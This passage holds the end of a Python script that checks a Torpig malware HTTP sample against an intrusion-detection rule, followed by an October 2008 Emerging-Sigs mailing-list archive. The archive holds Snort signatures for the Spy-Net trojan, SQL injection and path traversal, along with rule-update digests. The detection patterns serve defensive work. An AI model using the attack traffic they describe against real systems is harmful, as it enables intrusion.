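    return {
        "method": method.decode("ascii"),
        "target": target.decode("ascii"),
        "version": version.decode("ascii"),
        "headers": headers,
        "body_len": len(body),
    }


# Constructed benign request for comparison: an ordinary HTTP/1.1 form post
# with a body. It contains "POST" but fails the other three checks.
BENIGN_POST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 27\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"user=alice&password=secret1"
)

if __name__ == "__main__":
    hit = parse_hexdump(TORPIG_HIT)
    info = request_summary(hit)
    print(len(hit), "bytes:", info["method"], info["version"], "to",
          info["headers"]["Host"], "with", info["body_len"], "body bytes")
    print("Torpig sample matches the rule:", rule_matches(hit))
    print("Benign POST matches the rule:", rule_matches(BENIGN_POST))
```

The decoded sample is a 307-byte HTTP/1.0 POST with an empty body, which is exactly the combination the four independent checks key on; any legitimate client sending an empty-bodied HTTP/1.0 POST with Connection: close would also match, which is where further tuning would go.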
From chris.a.libby at gmail.com Tue Oct 7 10:10:32 2008
From: chris.a.libby at gmail.com (Chris Libby)
Date: Tue, 7 Oct 2008 10:10:32 -0400
Subject: [Emerging-Sigs] Empty source IP in 2500075
Message-ID:

FYI - snort threw an empty IP on 2500075 this morning. I've included the error and the rule I have.

Thanks - Chris

--Error--
Oct 7 07:50:25 snorthost snort[21781]: FATAL ERROR: /etc/snort/rules/emerging-compromised.rules(79) => Empty IP used either as source IP or as destination IP in a rule. IP list: [].

--Rule--
alert ip [] any -> $HOME_NET any (msg:"ET COMPROMISED Known Compromised or Hostile Host Traffic (76)"; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2500075; rev:1292; reference:url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts;)

From jonkman at jonkmans.com Tue Oct 7 10:50:40 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 07 Oct 2008 10:50:40 -0400
Subject: [Emerging-Sigs] Empty source IP in 2500075
In-Reply-To:
References:
Message-ID: <48EB7740.6080100@jonkmans.com>

Got it, script issue. Fixed (correctly this time, I hope). Should be good if you pull again.

Matt

Chris Libby wrote:
> FYI - snort threw an empty IP on 2500075 this morning. I've included the
> error and the rule I have. Thanks - Chris
>
> --Error--
> Oct 7 07:50:25 snorthost snort[21781]: FATAL ERROR:
> /etc/snort/rules/emerging-compromised.rules(79) => Empty IP used either as
> source IP or as destination IP in a rule. IP list: [].
> --Rule--
> alert ip [] any -> $HOME_NET any (msg:"ET COMPROMISED Known Compromised or
> Hostile Host Traffic (76)"; threshold: type limit, track by_src, seconds 60,
> count 1; classtype:misc-attack; sid:2500075; rev:1292;
> reference:url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts;)
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Tue Oct 7 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue, 7 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081007200008.D7CC94502B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Tue Oct 7 16:00:08 2008 [***]

[///] Modified active rules: [///]

2002916 - ET EXPLOIT RealVNC Authentication Bypass Attempt (emerging-exploit.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (1):
2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/
-> Added to emerging-sid-msg.map.txt (1):
2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (5):
2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,www.cl.cam.ac.uk/Research/DTG/attarchive/vnc/rfbproto.pdf || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/
2500073 || ET COMPROMISED Known Compromised or Hostile Host Traffic (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500074 || ET COMPROMISED Known Compromised or Hostile Host Traffic (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510073 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510074 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
-> Removed from emerging-sid-msg.map.txt (5):
2002916 || ET EXPLOIT RealVNC Authentication Bypass Attempt || cve,2006-2369 || url,www.cl.cam.ac.uk/Research/DTG/attarchive/vnc/rfbproto.pdf || url,archives.neohapsis.com/archives/fulldisclosure/2006-05/0356.html || url,secunia.com/advisories/20107/
2500073 || ET COMPROMISED Known Compromised or Hostile Host Traffic (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500074 || ET COMPROMISED Known Compromised or Hostile Host Traffic (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510073 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (74) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510074 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (75) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From campesic at centenarycollege.edu Wed Oct 8 15:20:14 2008
From: campesic at centenarycollege.edu (Campesi, Christopher)
Date: Wed, 8 Oct 2008 15:20:14 -0400
Subject: [Emerging-Sigs] Spy-Net Trojan
Message-ID: <54125DA6FB3A3249B874A94D39E9E6D903BC0D7C@BENDER.centenarycollege.edu>

Another Trojan I downloaded.

Server seems to be 1024+, however the client portion can have any port the person wants it to operate on.

This one is the initial connection before information about the type of OS is sent.
Between the two contents seems to be a random 3 digit number.

alert tcp $EXTERNAL_NET any -> $HOME_NET 1024:65535 (msg:"Spy-Net Trojan Connection";content:"maininfo|7c|";offset:0;depth:9;content:"|7c|";distance:3;classtype:trojan-activity;sid:XXXXXX;rev:1;)

This one lets the client know the server is connected and ready:

alert tcp $HOME_NET 1024:65535 -> $EXTERNAL_NET any (msg:"Spy-Net Trojan Connection (2)";flags:PA;content:"conectado|7c 0a|";offset:0;depth:11;classtype:trojan-activity;sid:XXXXX;rev:1;)

Christopher

From emerging at emergingthreats.net Wed Oct 8 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed, 8 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081008200008.9807345026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Wed Oct 8 16:00:08 2008 [***]

[+++] Added rules: [+++]

2008639 - ET TROJAN Tibs Trojan Downloader (emerging-virus.rules)
2008640 - ET SCAN SIP erase_registrations/add registrations attempt (emerging-voip.rules)
2008641 - ET SCAN sipscan probe (emerging-voip.rules)
2008642 - ET TROJAN Keylogger PRO GOLD Post (emerging-virus.rules)
2406031 - ET RBN Known Russian Business Network Monitored Domains (32) (emerging-rbn.rules)
2407031 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) (emerging-rbn-BLOCK.rules)

[///] Modified active rules: [///]

2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules)
2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules)
2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules)
2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules)
2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules)
2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules)
2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules)
2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules)
2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules)
2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules)
2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules)
2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules)
2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules)
2406021 - ET RBN Known Russian Business Network Monitored Domains (22) (emerging-rbn.rules)
2406022 - ET RBN Known Russian Business Network Monitored Domains (23) (emerging-rbn.rules)
2406023 - ET RBN Known Russian Business Network Monitored Domains (24) (emerging-rbn.rules)
2406024 - ET RBN Known Russian Business Network Monitored Domains (25) (emerging-rbn.rules)
2406025 - ET RBN Known Russian Business Network Monitored Domains (26) (emerging-rbn.rules)
2406026 - ET RBN Known Russian Business Network Monitored Domains (27) (emerging-rbn.rules)
2406027 - ET RBN Known Russian Business Network Monitored Domains (28) (emerging-rbn.rules)
2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules)
2406029 - ET RBN Known Russian Business Network Monitored Domains (30) (emerging-rbn.rules)
2406030 - ET RBN Known Russian Business Network Monitored Domains (31) (emerging-rbn.rules)
2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules)
2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules)
2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules)
2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules)
2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules)
2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules)
2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules)
2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules)
2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules)
2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules)
2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules)
2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules)
2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules)
2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules)
2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules)
2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules)
2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules)
2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules)
2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules)
2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules)
2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules)
2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules)
2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules)
2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules)
2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules)
2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules)
2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules)
2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules)
2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules)
2407029 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (30) (emerging-rbn-BLOCK.rules)
2407030 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (31) (emerging-rbn-BLOCK.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-rbn-BLOCK.rules (2):
# VERSION 80
# Updated 2008-10-08 09:28:13
-> Added to emerging-rbn.rules (2):
# VERSION 80
# Updated 2008-10-08 09:28:13
-> Added to emerging-sid-msg.map (6):
2008639 || ET TROJAN Tibs Trojan Downloader
2008640 || ET SCAN SIP erase_registrations/add registrations attempt || url,www.hackingvoip.com/sec_tools.html
2008641 || ET SCAN sipscan probe || url,www.hackingvoip.com/sec_tools.html
2008642 || ET TROJAN Keylogger PRO GOLD Post
2406031 || ET RBN Known Russian Business Network Monitored Domains (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
2407031 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
-> Added to emerging-sid-msg.map.txt (6):
2008639 || ET TROJAN Tibs Trojan Downloader
2008640 || ET SCAN SIP erase_registrations/add registrations attempt || url,www.hackingvoip.com/sec_tools.html
2008641 || ET SCAN sipscan probe || url,www.hackingvoip.com/sec_tools.html
2008642 || ET TROJAN Keylogger PRO GOLD Post
2406031 || ET RBN Known Russian Business Network Monitored Domains (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
2407031 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (32) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork
-> Added to emerging-virus.rules (3):
#ref: 13bce3215f758d69a6574f7018ed8c32
#by jeremy conway
#ref: 61441e5fab0173480c05f876e5ebd07b
-> Added to emerging-voip.rules (2):
#by Kevin Ross
#by Kevin Ross

[---] Removed non-rule lines: [---]

-> Removed from emerging-rbn-BLOCK.rules (2):
# VERSION 79
# Updated 2008-10-05 19:23:05
-> Removed from emerging-rbn.rules (2):
# VERSION 79
# Updated 2008-10-05 19:23:05
-> Removed from emerging-sid-msg.map (4):
2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org
2500072 || ET COMPROMISED Known Compromised or Hostile Host Traffic (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510072 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
-> Removed from emerging-sid-msg.map.txt (4):
2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org
2500072 || ET COMPROMISED Known Compromised or Hostile Host Traffic (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510072 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (73) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From dxp2532 at gmail.com Wed Oct 8 16:53:10 2008
From: dxp2532 at gmail.com (dxp)
Date: Wed, 08 Oct 2008 16:53:10 -0400
Subject: [Emerging-Sigs] Suspicious HTTP header
Message-ID: <1223499190.7636.7.camel@kinta>

I've been seeing web requests with a strange header in them, has anyone seen this or know what this is?

--- snip ---
Accept: */*
Accept-Language: en-us
--------: -------- --------
Host: xxx.2o7.net
Connection: Keep-Alive
--- snip ---

-
-=[ dxp ]=-
0xA3F3C6E3

From dxp2532 at gmail.com Thu Oct 9 12:59:33 2008
From: dxp2532 at gmail.com (dxp)
Date: Thu, 09 Oct 2008 12:59:33 -0400
Subject: [Emerging-Sigs] [Fwd: Suspicious HTTP header]
Message-ID: <1223571573.7636.16.camel@kinta>

Several people have replied to me offline and I appreciate their response.
However, I haven't explained what the concern was, my apologies. I'm not concerned with the Host field (2o7.net) but rather the header consisting of dashes. Does anyone know if this is malicious in nature or some legit app?

-
-=[ dxp ]=-
0xA3F3C6E3

-------- Forwarded Message --------
From: dxp
To: emerging-sigs at emergingthreats.net
Subject: Suspicious HTTP header
Date: Wed, 08 Oct 2008 16:53:14 -0400

I've been seeing web requests with a strange header in them, has anyone seen this or know what this is?

--- snip ---
Accept: */*
Accept-Language: en-us
--------: -------- --------
Host: xxx.2o7.net
Connection: Keep-Alive
--- snip ---

-
-=[ dxp ]=-
0xA3F3C6E3

From william.salusky at corp.aol.com Thu Oct 9 13:19:09 2008
From: william.salusky at corp.aol.com (Salusky, William)
Date: Thu, 9 Oct 2008 13:19:09 -0400
Subject: [Emerging-Sigs] Suspicious HTTP header]
Message-ID: <660710B0196A584EAACB5E3A418D6BE00152CF8E@EXCHNVA01.ad.office.aol.com>

The 'dashed header' is a common outbound/transit/transparent client request header sanitization approach applied by a number of software client proxies and intermediary hardware devices (NATs/proxies). You can usually deduce the header and values based on the one-for-one character regex, assuming both header name and values are common/RFC defined.

W

----
William Salusky (via mobile device)
William.Salusky at corp.aol.com
Principal Tech Security Engineer
(Office) 703-265-4924 - (mobile) 571-480-1933

________________________________
From: emerging-sigs-bounces at emergingthreats.net
To: emerging-sigs at emergingthreats.net
Sent: Thu Oct 09 12:59:33 2008
Subject: [Emerging-Sigs] [Fwd: Suspicious HTTP header]

Several people have replied to me offline and I appreciate their response. However, I haven't explained what the concern was, my apologies. I'm not concerned with the Host field (2o7.net) but rather the header consisting of dashes. Does anyone know if this is malicious in nature or some legit app?

-
-=[ dxp ]=-
0xA3F3C6E3

-------- Forwarded Message --------
From: dxp
To: emerging-sigs at emergingthreats.net
Subject: Suspicious HTTP header
Date: Wed, 08 Oct 2008 16:53:14 -0400

I've been seeing web requests with a strange header in them, has anyone seen this or know what this is?

--- snip ---
Accept: */*
Accept-Language: en-us
--------: -------- --------
Host: xxx.2o7.net
Connection: Keep-Alive
--- snip ---

-
-=[ dxp ]=-
0xA3F3C6E3

From jonkman at jonkmans.com Thu Oct 9 16:38:29 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 09 Oct 2008 16:38:29 -0400
Subject: [Emerging-Sigs] Suspicious HTTP header]
In-Reply-To: <660710B0196A584EAACB5E3A418D6BE00152CF8E@EXCHNVA01.ad.office.aol.com>
References: <660710B0196A584EAACB5E3A418D6BE00152CF8E@EXCHNVA01.ad.office.aol.com>
Message-ID: <48EE6BC5.5090405@jonkmans.com>

I would agree there, this is likely not hostile. 2o7 may not be an ideal advertiser, but I doubt they are malicious. Interesting catch though.
Matt

Salusky, William wrote:
> The 'dashed header' is a common outbound/transit/transparent client
> request header sanitization approach applied by a number of software
> client proxies and intermediary hardware devices (NATs/proxies). You can
> usually deduce the header and values based on the one-for-one character
> regex, assuming both header name and values are common/RFC defined.
>
> W
>
> ----
> William Salusky (via mobile device) William.Salusky at corp.aol.com
> Principal Tech Security Engineer
> (Office) 703-265-4924 - (mobile) 571-480-1933
>
> ------------------------------------------------------------------------
> From: emerging-sigs-bounces at emergingthreats.net
> To: emerging-sigs at emergingthreats.net
> Sent: Thu Oct 09 12:59:33 2008
> Subject: [Emerging-Sigs] [Fwd: Suspicious HTTP header]
>
> Several people have replied to me offline and I appreciate their
> response. However, I haven't explained what the concern was, my
> apologies. I'm not concerned with the Host field (2o7.net) but rather
> the header consisting of dashes. Does anyone know if this is malicious
> in nature or some legit app?
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
> -------- Forwarded Message --------
> From: dxp
> To: emerging-sigs at emergingthreats.net
> Subject: Suspicious HTTP header
> Date: Wed, 08 Oct 2008 16:53:14 -0400
>
> I've been seeing web requests with a strange header in them, has anyone
> seen this or know what this is?
>
> --- snip ---
> Accept: */*
> Accept-Language: en-us
> --------: -------- --------
> Host: xxx.2o7.net
> Connection: Keep-Alive
> --- snip ---
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
> ------------------------------------------------------------------------

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From jgimer at gmail.com Thu Oct 9 18:38:33 2008
From: jgimer at gmail.com (Joshua Gimer)
Date: Thu, 9 Oct 2008 16:38:33 -0600
Subject: [Emerging-Sigs] Emerging IPTables Update Script Update
Message-ID:

I just updated the Emerging IPTables update script. There were a lot of issues with the old one; it is almost a complete rewrite.

Changes in Version 2.0
- Added Syslog support
- Added IP address verification
- Added individual IP address and CIDR range white-listing support

You can get the new version from http://doc.emergingthreats.net/bin/view/Main/EmergingFirewallRules

Any feedback is always welcome.

--
Thx
Joshua Gimer

From jonkman at jonkmans.com Thu Oct 9 21:37:27 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 09 Oct 2008 21:37:27 -0400
Subject: [Emerging-Sigs] Spy-Net Trojan
In-Reply-To: <54125DA6FB3A3249B874A94D39E9E6D903BC0D7C@BENDER.centenarycollege.edu>
References: <54125DA6FB3A3249B874A94D39E9E6D903BC0D7C@BENDER.centenarycollege.edu>
Message-ID: <48EEB1D7.5000203@jonkmans.com>

Added, great sigs, sorry for the delay posting. Lost in the inbox.
:)

matt

Campesi, Christopher wrote:
> Another Trojan I downloaded.
>
> Server seems to be 1024+, however the client portion can have any port
> the person wants it to operate on.
>
> This one is the initial connection before information about the type of
> OS is sent. Between the two contents seems to be a random 3 digit number.
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 1024:65535 (msg:"Spy-Net Trojan
> Connection";content:"maininfo|7c|";offset:0;depth:9;content:"|7c|";distance:3;classtype:trojan-activity;sid:XXXXXX;rev:1;)
>
> This one lets the client know the server is connected and ready
>
> alert tcp $HOME_NET 1024:65535 -> $EXTERNAL_NET any (msg:"Spy-Net Trojan
> Connection (2)";flags:PA;content:"conectado|7c
> 0a|";offset:0;depth:11;classtype:trojan-activity;sid:XXXXX;rev:1;)
>
> Christopher
>
> ------------------------------------------------------------------------

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Fri Oct 10 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 10 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081010200008.55B5245026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Fri Oct 10 16:00:08 2008 [***]

[+++] Added rules: [+++]

2008643 - ET MALWARE Suspicious User-Agent Detected (Downloader1.2) (emerging-malware.rules)
2008644 - ET TROJAN Spy-Net Trojan Connection (emerging-virus.rules)
2008645 - ET TROJAN Spy-Net Trojan Connection (2) (emerging-virus.rules)
2008646 - ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC (emerging.rules)
2008647 - ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus) (emerging-malware.rules)

[///] Modified active rules: [///]

2001980 - ET POLICY SSH Client Banner Detected on Unusual Port (emerging-policy.rules)
2008564 - ET MALWARE Suspicious User-Agent (Internet HTTP Request) (emerging-malware.rules)
2008629 - ET SCAN Wikto Backend Data Miner Scan (emerging-scan.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (5):
2008643 || ET MALWARE Suspicious User-Agent Detected (Downloader1.2)
2008644 || ET TROJAN Spy-Net Trojan Connection
2008645 || ET TROJAN Spy-Net Trojan Connection (2)
2008646 || ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC || url,isc.sans.org/diary.html?storyid=5159
2008647 || ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus)
-> Added to emerging-sid-msg.map.txt (5):
2008643 || ET MALWARE Suspicious User-Agent Detected (Downloader1.2)
2008644 || ET TROJAN Spy-Net Trojan Connection
2008645 || ET TROJAN Spy-Net Trojan Connection (2)
2008646 || ET CURRENT_EVENTS Trojan resulting from Fake MS Updates Email Login to CnC || url,isc.sans.org/diary.html?storyid=5159
2008647 || ET MALWARE Internet-antivirus.com Related Fake AV User-Agent Detected (Update Internet Antivirus)
-> Added to emerging-virus.rules (1):
#This one is lets the client know the server is connected and ready
-> Added to emerging.rules (1):
# fake email for MS Updates results in a trojan that uses this fake UA

From signatures at stillsecure.com Sat Oct 11 06:11:52 2008
From: signatures at stillsecure.com (signatures)
Date: Sat, 11 Oct 2008 04:11:52 -0600
Subject: [Emerging-Sigs] StillSecure: 5 New Signatures - Oct-11-2008
Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2906@webmail.latis.com>

Hi Matt,

Please find 5 new signatures below:

1. PHP Autos catid SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PHP Autos catid SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/searchresults.php?catid="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6696; reference:url,secunia.com/advisories/32139/; sid:8436; rev:1;)

2. PHP Realtor v_cat SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"PHP Realtor v_cat SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/view_cat.php?v_cat="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6694; reference:url,secunia.com/advisories/32149/; sid:8437; rev:1;)

3. JMweb MP3 src Multiple Local File Inclusion

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"JMweb MP3 src Multiple Local File Inclusion"; flow:established,to_server; content:"GET "; depth:4; pcre:"/(listen.php|download.php)/"; uricontent:"?src="; nocase; pcre:"/(\.\.\/){1,}/"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6669; sid:8438; rev:1;)

4. ScriptsEz Easy Image Downloader id File Disclosure

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ScriptsEz Easy Image Downloader id File Disclosure"; flow:established,to_server; content:"GET "; depth:4; uricontent:"main.php?action=download"; nocase; uricontent:"&id="; nocase; pcre:"/(\.\.\/){1,}/"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6715; reference:url,secunia.com/Advisories/32210/; sid:8439; rev:1;)

5. Built2go Real Estate Listings event_id SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Built2go Real Estate Listings event_id SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/event_detail.php?event_id="; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6697; reference:url,secunia.com/Advisories/32129/; sid:8440; rev:1;)

Looking forward to your comments, if any...

Thanks & Regards,
StillSecure

From jonkman at jonkmans.com Sat Oct 11 10:53:29 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Sat, 11 Oct 2008 10:53:29 -0400
Subject: [Emerging-Sigs] StillSecure: 5 New Signatures - Oct-11-2008
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2906@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2906@webmail.latis.com>
Message-ID: <48F0BDE9.1050803@jonkmans.com>

Great stuff guys! Posting now.

Matt

signatures wrote:
> Hi Matt,
>
> Please find 5 new signatures below:
>
> 1.
